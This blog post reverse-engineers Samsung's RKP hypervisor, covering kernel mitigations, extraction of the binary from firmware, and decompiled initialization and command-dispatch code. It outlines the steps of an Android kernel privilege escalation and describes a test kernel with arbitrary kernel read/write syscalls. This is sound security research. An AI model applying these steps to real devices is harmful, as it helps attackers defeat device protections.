A Samsung RKP Compendium

The purpose of this blog post is to provide a comprehensive reference of the inner workings of the Samsung RKP. It enables anyone to start poking at this obscure code that is executing at a high privilege level on their device. In addition, a now-fixed vulnerability that allowed getting code execution in Samsung RKP is revealed. It is a good example of a simple mistake that compromises platform security, as the exploit consists of a single call, which is all it takes to make hypervisor memory writable from the kernel.

In the first part, we will talk briefly about Samsung's kernel mitigations (that probably deserve a blog post of their own). In the second part, we will explain how to get your hands on the RKP binary for your device.

In the third part, we will start taking apart the hypervisor framework that supports RKP on the Exynos devices, before digging into the internals of RKP in the fourth part. We will detail how it is started, how it processes the kernel page tables, how it protects sensitive data structures, and finally, how it enables the kernel mitigations.

In the fifth and last part, we will reveal the vulnerability, the one-liner exploit, and take a look at the patch.

Introduction

In the mobile device world, security traditionally relied on kernel mechanisms. But history has shown that the kernel is far from unbreakable. For most Android devices, finding a kernel vulnerability allows an attacker to modify sensitive kernel data structures, elevate privileges, and execute malicious code.

It is also simply not enough to ensure kernel integrity at boot time (using the Verified Boot mechanism). Kernel integrity must also be verified at run time. This is what a security hypervisor aims to do. RKP, standing for Real-time Kernel Protection, is the name of Samsung's hypervisor implementation, which is part of Samsung KNOX.

There is already a lot of great research that has been done on Samsung RKP, specifically Gal Beniamini's Lifting the (Hyper) Visor: Bypassing Samsung’s Real-Time Kernel Protection and Aris Thallas's On emulating hypervisors: a Samsung RKP case study, both of which we highly recommend reading before this blog post.

Kernel Exploitation

A typical local privilege escalation (LPE) flow on Android involves:

  • bypassing KASLR by leaking a kernel pointer;
  • getting a one-off arbitrary kernel memory read/write;
  • using it to overwrite a kernel function pointer;
  • calling a function to set the address_limit to -1;
  • bypassing SELinux by overwriting selinux_(enable|enforcing);
  • escalating privileges by writing the uid, gid, sid, capabilities, etc.

Samsung has implemented mitigations to try and make that task as hard as possible for an attacker: JOPP, ROPP and KDP are three of them. Not all Samsung devices have the same mitigations in place, though.

Here is what we observed after downloading various firmware updates:

Device Region JOPP ROPP KDP
Low-end International No No Yes
Low-end United States No No Yes
High-end International Yes No Yes
High-end United States Yes Yes Yes

JOPP

Jump-Oriented Programming Prevention (JOPP) aims to prevent JOP. It is a homemade CFI solution. It begins by inserting a NOP instruction before each function's start using a modified compiler toolchain. It then uses a Python script (scripts/rkp_cfp/instrument.py) to process the compiled kernel binary: NOPs are replaced with a magic value (0xbe7bad) and indirect branches with a direct branch to a helper function.

The helper function jopp_springboard_blr_rX (in init/rkp_cfp.S) will check if the value before the target matches the magic value and take the jump if it does, or crash if it doesn't:

    .macro  springboard_blr, reg
    jopp_springboard_blr_\reg:
    push    RRX, xzr
    ldr RRX_32, [\reg, #-4]
    subs    RRX_32, RRX_32, #0xbe7, lsl #12
    cmp RRX_32, #0xbad
    b.eq    1f
    ...
    inst    0xdeadc0de //crash for sure
    ...
1:
    pop RRX, xzr
    br  \reg
    .endm

ROPP

Return-Oriented Programming Prevention (ROPP) aims to prevent ROP. It is a homemade "stack canary". It uses the same modified compiler toolchain to emit NOP instructions before stp x29, x30 instructions and after ldp x29, x30 instructions, and to prevent allocation of registers X16 and X17. It then uses the same Python script to replace the prologues and epilogues of assembled C functions like so:

    nop
    stp x29, x30, [sp,#-<frame>]!
    (insns)
    ldp x29, x30, ...
    nop

is replaced by

    eor RRX, x30, RRK
    stp x29, RRX, [sp,#-<frame>]!
    (insns)
    ldp x29, RRX, ...
    eor x30, RRX, RRK

where RRX is an alias for X16 and RRK for X17.

RRK is called the "thread key" and is unique to each kernel task. Instead of directly pushing the return address onto the stack, the rewritten prologue XORs it with this key first, preventing an attacker from changing the return address without knowledge of the thread key.

The thread key itself is stored in the rrk field of the thread_info structure, but XORed with the RRMK.

struct thread_info {
    // ...
    unsigned long rrk;
};

RRMK is called the "master key". On production devices, it is stored in the system register Debug Breakpoint Control Register 5 (DBGBCR5_EL1). It is set by the hypervisor during kernel initialization, as we will see later.
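
To make the scheme concrete, here is a short sketch of how the stored value relates to the two keys. It is our own reconstruction, and the helper names are made up:

/* Minimal sketch of the ROPP key scheme described above (our own helpers). */
unsigned long ropp_thread_key(struct thread_info *ti, unsigned long rrmk)
{
    /* The per-thread key is the rrk field XORed with the master key (RRMK),
     * which production devices keep in DBGBCR5_EL1. */
    return ti->rrk ^ rrmk;
}

unsigned long ropp_encoded_lr(unsigned long lr, unsigned long thread_key)
{
    /* What the rewritten prologue computes with `eor RRX, x30, RRK` before
     * storing it on the stack in place of the raw return address. */
    return lr ^ thread_key;
}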

KDP

Kernel Data Protection (KDP) is another hypervisor-enabled mitigation. It is a homemade Data Flow Integrity (DFI) solution. It makes sensitive kernel data structures (like the page tables, struct cred, struct task_security_struct, struct vfsmount, SELinux status, etc.) read-only thanks to the hypervisor.

Getting Started

Hypervisor Crash Course

For understanding Samsung RKP, you will need some basic knowledge about the virtualization extensions on ARMv8 platforms. We recommend that you read the section "HYP 101" of Lifting the (Hyper) Visor or the section "ARM Architecture & Virtualization Extensions" of On emulating hypervisors.

A hypervisor, to paraphrase these chapters, executes at a higher privilege level than the kernel, giving it complete control over the latter. Here is what the architecture looks like on ARMv8 platforms:

[figure: ARMv8 exception levels]

The hypervisor can receive calls from the kernel via the Hypervisor Call (HVC) instruction. Moreover, by using the Hypervisor Configuration Register (HCR), the hypervisor can trap critical operations usually handled by the kernel (access to virtual memory control registers, etc.) and also handle general exceptions.

Finally, the hypervisor takes advantage of a second layer of address translation, called "stage 2 translation". In the standard "stage 1 translation", a Virtual Address (VA) is translated into an Intermediate Physical Address (IPA). This IPA is then translated into the final Physical Address (PA) by the second stage.

Here is what the address translation looks like with 2-stage address translation enabled:

[figure: two-stage address translation, VA to IPA to PA]

The hypervisor still only has a single-stage address translation for its own memory accesses.

Our Research Platform

To make it easier to get started with this research, we have been using a bootloader-unlocked Samsung A51 (SM-A515F) instead of a full exploit chain. We have downloaded the kernel source code for our device from the Samsung Open Source website, modified it, and recompiled it (which did not work out of the box).

For this research, we have implemented new syscalls:

  • kernel memory allocation/freeing;
  • arbitrary read/write of kernel memory;
  • hypervisor call (using the uh_call function).

These syscalls make it really convenient to interact with RKP as you will see in the exploitation section: we just need to write a piece of C code (or Python) that will execute in userland and perform whatever we want.
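
For instance, the hypervisor call syscall can be a very thin wrapper around uh_call. Below is a minimal sketch of this approach; the syscall name is ours, and only uh_call and its six arguments come from the Samsung kernel sources:

#include <linux/syscalls.h>

/* Forward the six arguments as-is to the hypervisor (which executes an HVC). */
SYSCALL_DEFINE6(uh_call_fwd, u64, app_id, u64, cmd_id,
                u64, arg0, u64, arg1, u64, arg2, u64, arg3)
{
    uh_call(app_id, cmd_id, arg0, arg1, arg2, arg3);
    return 0;
}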

Extracting the Binary

RKP is implemented for both Exynos and Snapdragon-equipped devices, and both implementations share a lot of code. However, most, if not all, of the existing research has been done on the Exynos variant, as it is the most straightforward to dig into: RKP is available as a standalone binary. On Snapdragon devices, it is embedded inside the Qualcomm Hypervisor Execution Environment (QHEE) image, which is very large and complicated.

Exynos Devices

On Exynos devices, RKP used to be embedded directly into the kernel binary, and so it could be found as the vmm.elf file in the kernel source archives. Around late 2017/early 2018, VMM was rewritten into a new framework called uH, which most likely stands for "micro-hypervisor". Consequently, the binary has been renamed to uh.elf and can still be found in the kernel source archives for a few devices.

Following Gal Beniamini's first suggested design improvement, on most devices, RKP has been moved out of the kernel binary and into a partition of its own called uh. That makes it even easier to extract, for example by grabbing it from the BL_xxx.tar archive contained in a firmware update (it is usually LZ4-compressed and starts with a 0x1000-byte header that needs to be stripped to get to the real ELF file).

The architecture has changed slightly on the S20 and later devices, as Samsung has introduced another framework to support RKP (called H-Arx), most likely to further unify the code base with the Snapdragon devices; it also features more uH "apps". However, we won't be taking a look at it in this blog post.

Snapdragon Devices

On Snapdragon devices, RKP can be found in the hyp partition and can also be extracted from the BL_xxx.tar archive in a firmware update. It is one of the segments that make up the QHEE image.

The main difference from Exynos devices is that QHEE is the component that sets up the page tables and the exception vector. As a result, it is QHEE that notifies uH when exceptions happen (HVC or trapped system register accesses), and uH has to call into QHEE when it wants to modify the page tables. The rest of the code is almost identical.

Symbols and Log Strings

Back in 2017, the RKP binary was shipped with symbols and log strings. But that isn't the case anymore. Nowadays, the binaries are stripped, and the log strings are replaced with placeholders (like Qualcomm does). Nevertheless, we tried getting our hands on as many binaries as possible, hoping that Samsung did not do that for all of their devices, as is sometimes the case with other OEMs.

By mass downloading firmware updates for various Exynos devices, we gathered around 300 unique hypervisor binaries. None of the uh.elf files had symbols, so we had to manually port them over from the old vmm.elf files. Some of the uh.elf files had the full log strings, the latest being from Apr 9 2019.

With the full log strings and their hashed version, we could figure out that the hash value is simply the truncation of SHA256's output. Here is a Python one-liner to calculate the hash, in case you need it:

hashlib.sha256(log_string).hexdigest()[:8]

Hypervisor Framework

The uH framework acts as a micro-OS, of which RKP is an application. This is really more of a way to organize things, as "apps" are simply a bunch of command handlers and don't have any kind of isolation.

Utility Structures

Before digging into the code, we will briefly tell you about the utility structures that are used extensively by uH and the RKP app. We won't be detailing their implementation, but it is important to understand what they do.

Memlists

The memlist_t structure is a list of address ranges, a sort of specialized version of a C++ vector (it has a capacity and a size).

typedef struct memlist_entry {
  uint64_t addr;
  uint64_t size;
  uint64_t unkn_10;
  uint64_t extra;
} memlist_entry_t;
typedef struct memlist {
  memlist_entry_t* base;
  uint32_t capacity;
  uint32_t count;
  uint32_t merged;
  crit_sec_t cs;
} memlist_t;

There are functions to add and remove address ranges from a memlist, to check if an address is contained in a memlist, if an address range overlaps with a memlist, etc.
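
To give an idea of the API surface, here are the kinds of prototypes involved. memlist_init, memlist_add, and memlist_remove appear in the decompiled code later in this post; the two lookup helpers are hypothetical names for the checks mentioned above:

int64_t memlist_init(memlist_t* list);
int64_t memlist_add(memlist_t* list, uint64_t addr, uint64_t size);
int64_t memlist_remove(memlist_t* list, uint64_t addr, uint64_t size);
/* Hypothetical names for the lookup helpers. */
bool memlist_contains_addr(memlist_t* list, uint64_t addr);
bool memlist_overlaps_range(memlist_t* list, uint64_t addr, uint64_t size);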

Sparsemaps

The sparsemap_t structure is a map that associates values with addresses. It is created from a memlist and will map all the addresses in this memlist to a value. The size of this value is determined by the bit_per_page field.

typedef struct sparsemap_entry {
  uint64_t addr;
  uint64_t size;
  uint64_t bitmap_size;
  uint8_t* bitmap;
} sparsemap_entry_t;
typedef struct sparsemap {
  char name[8];
  uint64_t start_addr;
  uint64_t end_addr;
  uint64_t count;
  uint64_t bit_per_page;
  uint64_t mask;
  crit_sec_t cs;
  memlist_t* list;
  sparsemap_entry_t* entries;
  uint32_t private;
  uint32_t unkn_54;
} sparsemap_t;

There are functions to get and set the value for each entry of the map, etc.
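
Similarly, here is a rough sketch of the accessors: sparsemap_init is called later in this post with the signature below, while the getter and setter names are our own:

int64_t sparsemap_init(const char* name, sparsemap_t* map, memlist_t* list, uint64_t bit_per_page, uint32_t private);
/* Hypothetical names for the per-address accessors. */
uint64_t sparsemap_get_value_addr(sparsemap_t* map, uint64_t addr);
int64_t sparsemap_set_value_addr(sparsemap_t* map, uint64_t addr, uint64_t value);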

Critical Sections

The crit_sec_t structure is used to implement critical sections.

typedef struct crit_sec {
  uint32_t cpu;
  uint32_t lock;
  uint64_t lr;
} crit_sec_t;

And of course, there are functions to enter and exit the critical sections.
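
Their prototypes are as simple as it gets; cs_init, cs_enter, and cs_exit all show up in the decompiled code later in this post (the return types are our guess):

void cs_init(crit_sec_t* cs);
void cs_enter(crit_sec_t* cs);
void cs_exit(crit_sec_t* cs);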

System Initialization

uH/RKP is loaded into memory by the Samsung Bootloader (S-Boot). S-Boot jumps to the EL2 entry-point by asking the secure monitor (running at EL3) to start executing hypervisor code at the address it specifies.

uint64_t cmd_load_hypervisor() {
  // ...

  part = FindPartitionByName("UH");
  if (part) {
    dprintf("%s: loading uH image from %d..\n", "f_load_hypervisor", part->block_offset);
    ReadPartition(&hdr, part->file_offset, part->block_offset, 0x4c);
    dprintf("[uH] uh page size = 0x%x\n", (((hdr.size - 1) >> 12) + 1) << 12);
    total_size = hdr.size + 0x1210;
    dprintf("[uH] uh total load size = 0x%x\n", total_size);
    if (total_size > 0x200000 || hdr.size > 0x1fedf0) {
      dprintf("Could not do normal boot.(invalid uH length)\n");
      // ...
    }
    ret = memcmp_s(&hdr, "GREENTEA", 8);
    if (ret) {
      ret = -1;
      dprintf("Could not do uh load. (invalid magic)\n");
      // ...
    } else {
      ReadPartition(0x86fff000, part->file_offset, part->block_offset, total_size);
      ret = pit_check_signature(part->partition_name, 0x86fff000, total_size);
      if (ret) {
        dprintf("Could not do uh load. (invalid signing) %x\n", ret);
        // ...
      }
      load_hypervisor(0xc2000400, 0x87001000, 0x2000, 1, 0x87000000, 0x100000);
      dprintf("[uH] load hypervisor\n");
    }
  } else {
    ret = -1;
    dprintf("Could not load uH. (invalid ppi)\n");
    // ...
  }
  return ret;
}

void load_hypervisor(...) {
  dsb();
  asm("smc #0");
  isb();
}

Please note that on recent Samsung devices, the monitor code, based on the ARM Trusted Firmware (ATF), is no longer in plain-text in the S-Boot binary. In its place, one can find an encrypted blob. A vulnerability in Samsung's Trusted OS implementation (TEEGRIS) will need to be found so that plain-text monitor code can be dumped.

The address translation process for EL1 accesses has two stages, whereas the AT process for EL2 accesses only has one. In the hypervisor code, stage 1 (abbreviated s1) refers to the first stage of the EL2 AT process that governs hypervisor accesses. Stage 2 (abbreviated s2) refers to the second stage of the EL1 AT process that governs kernel accesses.

Execution starts in the default function. This function checks if it is running at EL2 before calling main. Once main returns, it makes an SMC, presumably to give control back to S-Boot.

void default(...) {
  // ...

  if (get_current_el() == (0b10 /* EL2 */ << 2)) {
    // Save registers x0 to x30, sp_el1, elr_el2, spsr_el2.
    // ...
    // Reset the .bss section.
    memset(&rkp_bss_start, 0, 0x1000);
    main(saved_regs.x0, saved_regs.x1, &saved_regs);
  }
  // Return to S-Boot after initialization.
  asm("smc #0");
}

After disabling the alignment checks and making sure the binary is loaded at the expected address (0x87000000 for this binary), main sets TTBR0_EL2 to its initial page tables and calls s1_enable to enable address translation at EL2. The initial page tables for EL2, embedded directly in the hypervisor binary, contain a 1:1 mapping of the uH region.

int32_t main(int64_t x0, int64_t x1, saved_regs_t* regs) {
  // ...

  // SCTLR_EL2, System Control Register (EL2).
  //
  //   - A,  bit [1] = 0: Alignment fault checking disabled.
  //   - SA, bit [3] = 0: SP Alignment check disabled.
  set_sctlr_el2(get_sctlr_el2() & 0xfffffff5);
  // Prevent the hypervisor from being initialized twice.
  if (!initialized) {
    initialized = 1;
    // Check if the loading address is as expected.
    if (&hyp_base != 0x87000000) {
      uh_log('L', "slsi_main.c", 326, "[-] static s1 mmu mismatch");
      return -1;
    }
    // Set the EL2 page tables start address.
    set_ttbr0_el2(&static_s1_page_tables_start__);
    // Enable the EL2 address translation.
    s1_enable();
    // Initialize the hypervisor.
    uh_init(0x87000000, 0x200000);
    // Initialize the virtual memory manager (VMM).
    if (vmm_init()) {
      return -1;
    }
    uh_log('L', "slsi_main.c", 338, "[+] vmm initialized");
    // Set the second stage EL1 page tables start address.
    set_vttbr_el2(&static_s2_page_tables_start__);
    uh_log('L', "slsi_main.c", 348, "[+] static s2 mmu initialized");
    // Enable the second stage of EL1 address translation.
    s2_enable();
    uh_log('L', "slsi_main.c", 351, "[+] static s2 mmu enabled");
  }
  uh_log('L', "slsi_main.c", 355, "[*] initialization completed");
  return 0;
}

s1_enable mostly sets cache-related fields of MAIR_EL2, TCR_EL2, and SCTLR_EL2, and most importantly, enables the MMU for EL2. main then calls the uh_init function and passes it the uH memory range. It seems that Gal Beniamini's second suggested design improvement, setting the WXN bit to 1, has also been implemented by the Samsung KNOX team.

void s1_enable() {
  // ...

  cs_init(&s1_lock);
  // MAIR_EL2, Memory Attribute Indirection Register (EL2).
  //
  //   - Attr0, bits[7:0]   = 0xff: Normal memory, Outer & Inner Write-Back Non-transient, Outer & Inner Read-Allocate
  //                                Write-Allocate).
  //   - Attr1, bits[15:8]  = 0x00: Device-nGnRnE memory.
  //   - Attr2, bits[23:16] = 0x44: Normal memory, Outer & Inner Write-Back Transient, Outer & Inner No Read-Allocate No
  //                                Write-Allocate).
  set_mair_el2(get_mair_el2() & 0xffffffffff000000 | 0x4400ff);
  // TCR_EL2, Translation Control Register (EL2).
  //
  //   - T0SZ,  bits [5:0]   = 24: TTBR0_EL2 region size is 2^40.
  //   - IRGN0, bits [9:8]   = 0b11: Normal memory, Outer & Inner Write-Back Read-Allocate No Write-Allocate Cacheable.
  //   - ORGN0, bits [11:10] = 0b11: Normal memory, Outer & Inner Write-Back Read-Allocate No Write-Allocate Cacheable.
  //   - SH0,   bits [13:12] = 0b11: Inner Shareable.
  //   - PS,    bits [18:16] = 0b010: PA size is 40 bits, 1TB.
  set_tcr_el2(get_tcr_el2() & 0xfff8c0c0 | 0x23f18);
  flush_entire_cache();
  sctlr_el2 = get_sctlr_el2();
  // SCTLR_EL2, System Control Register (EL2).
  //
  //   - C, bit [2] = 1: data is cacheable for EL2.
  //   - I, bit [12] = 1: instruction access is cacheable for EL2.
  //   - WXN, bit [19] = 1: writeable implies non-executable for EL2.
  set_sctlr_el2(sctlr_el2 & 0xfff7effb | 0x81004);
  invalidate_entire_s1_el2_tlb();
  //   - M, bit [0] = 1: EL2 stage 1 address translation enabled.
  set_sctlr_el2(sctlr_el2 & 0xfff7effa | 0x81005);
}

After saving the arguments into a global control structure called uh_state, uh_init calls static_heap_initialize. This function also saves its arguments into global variables and initializes the doubly linked list of heap chunks with a single free chunk spanning over the hypervisor memory range.

uh_init then calls static_heap_remove_range to remove three important ranges from the memory that can be returned by the static heap allocator (effectively splitting the original chunk into multiple ones):

  • the log region;
  • the uH (code/data/bss/stack) region;
  • the "bigdata" (analytics) region.

int64_t uh_init(int64_t uh_base, int64_t uh_size) {
  // ...

  // Reset the global state of the hypervisor.
  memset(&uh_state.base, 0, sizeof(uh_state));
  // Save the hypervisor base address and size.
  uh_state.base = uh_base;
  uh_state.size = uh_size;
  // Initialize the static heap with the whole hypervisor memory.
  static_heap_initialize(uh_base, uh_size);
  // But remove the log, uH and bigdata regions from it.
  if (!static_heap_remove_range(0x87100000, 0x40000) || !static_heap_remove_range(&hyp_base, 0x87046000 - &hyp_base) ||
      !static_heap_remove_range(0x870ff000, 0x1000)) {
    uh_panic();
  }
  // Initialize the log region.
  memory_init();
  uh_log('L', "main.c", 131, "================================= LOG FORMAT =================================");
  uh_log('L', "main.c", 132, "[LOG:L, WARN: W, ERR: E, DIE:D][Core Num: Log Line Num][File Name:Code Line]");
  uh_log('L', "main.c", 133, "==============================================================================");
  uh_log('L', "main.c", 134, "[+] uH base: 0x%p, size: 0x%lx", uh_state.base, uh_state.size);
  uh_log('L', "main.c", 135, "[+] log base: 0x%p, size: 0x%x", 0x87100000, 0x40000);
  uh_log('L', "main.c", 137, "[+] code base: 0x%p, size: 0x%p", &hyp_base, 0x46000);
  uh_log('L', "main.c", 139, "[+] stack base: 0x%p, size: 0x%p", stacks, 0x10000);
  uh_log('L', "main.c", 143, "[+] bigdata base: 0x%p, size: 0x%p", 0x870ffc40, 0x3c0);
  uh_log('L', "main.c", 152, "[+] date: %s, time: %s", "Feb 27 2020", "17:28:58");
  uh_log('L', "main.c", 153, "[+] version: %s", "UH64_3b7c7d4f exynos9610");
  // Register the command handlers for the INIT app.
  uh_register_commands(0, init_cmds, 0, 5, 1);
  // Register the command handlers for the RKP app.
  j_rkp_register_commands();
  uh_log('L', "main.c", 370, "%d app started", 1);
  // Initialize the INIT app.
  system_init();
  // Initialize the other apps (including the RKP app).
  apps_init();
  // Initialize the bigdata region.
  uh_init_bigdata();
  // Initialize the context buffer.
  uh_init_context();
  // Create the memlist of memory regions used by the dynamic heap allocator.
  memlist_init(&uh_state.dynamic_regions);
  // Create and fill the memlist of protected ranges (critical memory regions).
  pa_restrict_init();
  // Mark the hypervisor as initialized.
  uh_state.inited = 1;
  uh_log('L', "main.c", 427, "[+] uH initialized");
  return 0;
}

uh_init then calls memory_init which zeroes out the log region and maps it into the EL2 page tables. This region will be used by the printf-like string printing functions, which are called inside of the uh_log function.

int64_t memory_init() {
  // Reset the log region.
  memory_buffer = 0x87100000;
  memset(0x87100000, 0, 0x40000);
  cs_init(&memory_cs);
  clean_invalidate_data_cache_region(0x87100000, 0x40000);
  memory_buffer_index = 0;
  memory_active = 1;
  // Map it into the hypervisor page tables as writable.
  return s1_map(0x87100000, 0x40000, UNKN3 | WRITE | READ);
}

uh_init then logs various pieces of information using uh_log (these messages can be retrieved from /proc/uh_log on the device), before calling uh_register_commands and rkp_register_commands (which ends up calling uh_register_commands with a different set of arguments).

uh_register_commands takes as arguments the application ID, an array of command handlers, an optional command "checker" function, the number of commands in the array, and a debug flag. These values will be stored in the fields cmd_evtable, cmd_checkers, cmd_counts, and cmd_flags of the uh_state structure and will be used to handle hypervisor calls coming from the kernel.

int64_t uh_register_commands(uint32_t app_id,
                             int64_t cmd_array,
                             int64_t cmd_checker,
                             uint32_t cmd_count,
                             uint32_t flag) {
  // ...

  // Ensure the hypervisor hasn't already been initialized.
  if (uh_state.inited) {
    uh_log('D', "event.c", 11, "uh_register_event is not permitted after uh_init : %d", app_id);
  }
  // Perform sanity-checking on the application ID.
  if (app_id >= 8) {
    uh_log('D', "event.c", 14, "wrong app_id %d", app_id);
  }
  // Save the arguments into the `uh_state` global variable.
  uh_state.cmd_evtable[app_id] = cmd_array;
  uh_state.cmd_checkers[app_id] = cmd_checker;
  uh_state.cmd_counts[app_id] = cmd_count;
  uh_state.cmd_flags[app_id] = flag;
  uh_log('L', "event.c", 21, "app_id:%d, %d events and flag(%d) has registered", app_id, cmd_count, flag);
  // The "command checker" is optional.
  if (cmd_checker) {
    uh_log('L', "event.c", 24, "app_id:%d, cmd checker enforced", app_id);
  }
  return 0;
}

According to the kernel sources, there are only 3 applications defined, even though uH technically supports up to 8.

  • APP_INIT, which is used by S-Boot during initialization;
  • APP_SAMPLE, which is unused;
  • APP_RKP, which is used by the kernel to interact with RKP.

#define APP_INIT    0
#define APP_SAMPLE  1
#define APP_RKP     2

#define UH_PREFIX  UL(0xc300c000)
#define UH_APPID(APP_ID)  ((UL(APP_ID) & UL(0xFF)) | UH_PREFIX)

enum __UH_APP_ID {
    UH_APP_INIT     = UH_APPID(APP_INIT),
    UH_APP_SAMPLE   = UH_APPID(APP_SAMPLE),
    UH_APP_RKP  = UH_APPID(APP_RKP),
};
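
Expanding these macros gives the raw values that end up in x0 when the kernel issues an HVC, which is also why the hypervisor checks for the 0xc300cXXX prefix when dispatching calls (see vmm_synchronous_handler below). The standalone snippet below simply recomputes them; it is not code from the kernel sources:

#include <assert.h>
#include <stdint.h>

int main(void) {
  uint64_t prefix = 0xc300c000;
  assert(((0 /* APP_INIT   */ & 0xFF) | prefix) == 0xc300c000); /* UH_APP_INIT   */
  assert(((1 /* APP_SAMPLE */ & 0xFF) | prefix) == 0xc300c001); /* UH_APP_SAMPLE */
  assert(((2 /* APP_RKP    */ & 0xFF) | prefix) == 0xc300c002); /* UH_APP_RKP    */
  return 0;
}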

uh_init then calls system_init and apps_init. These functions call command handler #0 of the corresponding application(s): system_init calls it for APP_INIT, and apps_init for all the other registered applications. In our case, this ends up calling init_cmd_init and rkp_cmd_init, respectively.

uint64_t system_init() {
  // ...

  memset(&saved_regs, 0, sizeof(saved_regs));
  // Call the command handler #0 of APP_INIT.
  res = uh_handle_command(0, 0, &saved_regs);
  if (res) {
    uh_log('D', "main.c", 380, "system init failed %d", res);
  }
  return res;
}
uint64_t apps_init() {
  // ...

  memset(&saved_regs, 0, sizeof(saved_regs));
  // Iterate on all applications but APP_INIT.
  for (i = 1; i != 8; ++i) {
    // Ensure the application is registered.
    if (uh_state.cmd_evtable[i]) {
      uh_log('W', "main.c", 393, "[+] dst %d initialized", i);
      // Call the command handler #0 of the application.
      res = uh_handle_command(i, 0, &saved_regs);
      if (res) {
        uh_log('D', "main.c", 396, "app init failed %d", res);
      }
    }
  }
  return res;
}

uh_handle_command prints the app ID, command ID, and its arguments if the debug flag was set, calls the command checker function if any, and then calls the appropriate command handler.

int64_t uh_handle_command(uint64_t app_id, uint64_t cmd_id, saved_regs_t* regs) {
  // ...

  // If debug is enabled, log the command to be handled.
  if ((uh_state.cmd_flags[app_id] & 1) != 0) {
    uh_log('L', "main.c", 441, "event received %lx %lx %lx %lx %lx %lx", app_id, cmd_id, regs->x2, regs->x3, regs->x4,
           regs->x5);
  }
  // If a "command checker" is registered for the application, call it.
  cmd_checker = uh_state.cmd_checkers[app_id];
  if (cmd_id && cmd_checker && cmd_checker(cmd_id)) {
    uh_log('E', "main.c", 448, "cmd check failed %d %d", app_id, cmd_id);
    return -1;
  }
  // Perform sanity-checking on the application ID.
  if (app_id >= 8) {
    uh_log('D', "main.c", 453, "wrong dst %d", app_id);
  }
  // Ensure the destination application is registered.
  if (!uh_state.cmd_evtable[app_id]) {
    uh_log('D', "main.c", 456, "dst %d evtable is NULL\n", app_id);
  }
  // Perform sanity-checking on the command ID.
  if (cmd_id >= uh_state.cmd_counts[app_id]) {
    uh_log('D', "main.c", 459, "wrong type %lx %lx", app_id, cmd_id);
  }
  // Get the actual command handler.
  cmd_handler = uh_state.cmd_evtable[app_id][cmd_id];
  if (!cmd_handler) {
    uh_log('D', "main.c", 464, "no handler %lx %lx", app_id, cmd_id);
    return -1;
  }
  // And finally, call it.
  return cmd_handler(regs);
}

uh_init then calls uh_init_bigdata and uh_init_context.

uh_init_bigdata allocates and zeroes out the buffers used by the analytics feature. It also makes the bigdata region accessible as read/write in the EL2 page tables.

int64_t uh_init_bigdata() {
  // Allocate a buffer to store the analytics collected.
  if (!bigdata_state) {
    bigdata_state = malloc(0x230, 0);
  }
  // Reset this buffer and the bigdata global state.
  memset(0x870ffc40, 0, 960);
  memset(bigdata_state, 0, 560);
  // Map this buffer into the hypervisor as writable.
  return s1_map(0x870ff000, 0x1000, UNKN3 | WRITE | READ);
}

uh_init_context allocates and zeroes out a buffer that is used to store the hypervisor registers on platform resets (we don't know where it is used, maybe by the monitor to restore the hypervisor state on some event).

int64_t* uh_init_context() {
  // ...

  // Allocate a buffer to store the processor context.
  uh_context = malloc(0x1000, 0);
  if (!uh_context) {
    uh_log('W', "RKP_1cae4f3b", 21, "%s RKP_148c665c", "uh_init_context");
  }
  // Reset this buffer.
  return memset(uh_context, 0, 0x1000);
}

uh_init calls memlist_init to initialize the dynamic_regions memlist in the uh_state structure, which will contain the memory regions that can be used by the dynamic allocator, and then calls the pa_restrict_init function.

pa_restrict_init initializes the protected_ranges memlist, which contains the critical hypervisor memory regions that should be protected, and adds the hypervisor memory region to it. It also checks that rkp_cmd_counts and the protected_ranges structures are contained in the memlist as they should be.

int64_t pa_restrict_init() {
  // Initialize the memlist of protected ranges.
  memlist_init(&protected_ranges);
  // Add the uH memory region to it (containing the hypervisor code and data).
  protected_ranges_add(0x87000000, 0x200000);
  // Sanity-check: it must contain the `rkp_cmd_counts` array.
  if (!protected_ranges_contains(&rkp_cmd_counts)) {
    uh_log('D', "pa_restrict.c", 79, "Error, cmd_cnt not within protected range, cmd_cnt addr : %lx", rkp_cmd_counts);
  }
  // Sanity-check: it must also contain itself.
  if (!protected_ranges_contains(&protected_ranges)) {
    uh_log('D', "pa_restrict.c", 84, "Error protect_ranges not within protected range, protect_ranges addr : %lx",
           &protected_ranges);
  }
  return uh_log('L', "pa_restrict.c", 87, "[+] uH PA Restrict Init");
}

uh_init returns to main, which then calls vmm_init to initialize the virtual memory management system at EL1.

vmm_init sets the VBAR_EL2 register to the exception vector containing the hypervisor functions to be called to handle exceptions, and enables trapping of accesses to the virtual memory control registers at EL1.

int64_t vmm_init() {
  // ...

  uh_log('L', "vmm.c", 142, ">>vmm_init<<");
  cs_init(&stru_870355E8);
  cs_init(&panic_cs);
  // Set the vector table of the hypervisor.
  set_vbar_el2(&vmm_vector_table);
  // HCR_EL2, Hypervisor Configuration Register.
  //
  // TVM, bit [26] = 1: EL1 write accesses to the specified EL1 virtual memory control registers are trapped to EL2.
  hcr_el2 = get_hcr_el2() | 0x4000000;
  uh_log('L', "vmm.c", 161, "RKP_398bc59b %x", hcr_el2);
  set_hcr_el2(hcr_el2);
  return 0;
}

main then sets the VTTBR_EL2 register to the page tables that will be used for the second stage address translation at EL1. These are the page tables that translate a kernel IPA into an actual PA. Finally, before returning, main calls s2_enable.

s2_enable configures the second stage of address translation and enables it.

void s2_enable() {
  // ...

  cs_init(&s2_lock);
  // VTCR_EL2, Virtualization Translation Control Register.
  //
  //   - T0SZ,  bits [5:0]   = 24: VTTBR_EL2 region size is 2^40.
  //   - SL0,   bits [7:6]   = 0b01: Stage 2 translation lookup start at level 1.
  //   - IRGN0, bits [9:8]   = 0b11: Normal memory, Outer & Inner Write-Back Read-Allocate No Write-Allocate Cacheable.
  //   - ORGN0, bits [11:10] = 0b11: Normal memory, Outer & Inner Write-Back Read-Allocate No Write-Allocate Cacheable.
  //   - SH0,   bits [13:12] = 0b11: Inner Shareable.
  //   - TG0,   bits [15:14] = 0b00: Granule size is 4KB.
  //   - PS,    bits [18:16] = 0b010: PA size is 40 bits, 1TB.
  set_vtcr_el2(get_vtcr_el2() & 0xfff80000 | 0x23f58);
  invalidate_entire_s1_s2_el1_tlb();
  // HCR_EL2, Hypervisor Configuration Register.
  //
  // VM, bit [0] = 1: EL1&0 stage 2 address translation enabled.
  set_hcr_el2(get_hcr_el2() | 1);
  lock_start = 1;
}

App Initialization

We mentioned that uh_init calls the command #0 for each of the registered applications. Let's see what is being executed for the two applications that are used: APP_INIT and APP_RKP.

APP_INIT

The command handlers registered for APP_INIT are:

Command ID Command Handler Maximum Calls
0x00 init_cmd_init -
0x02 init_cmd_add_dynamic_region -
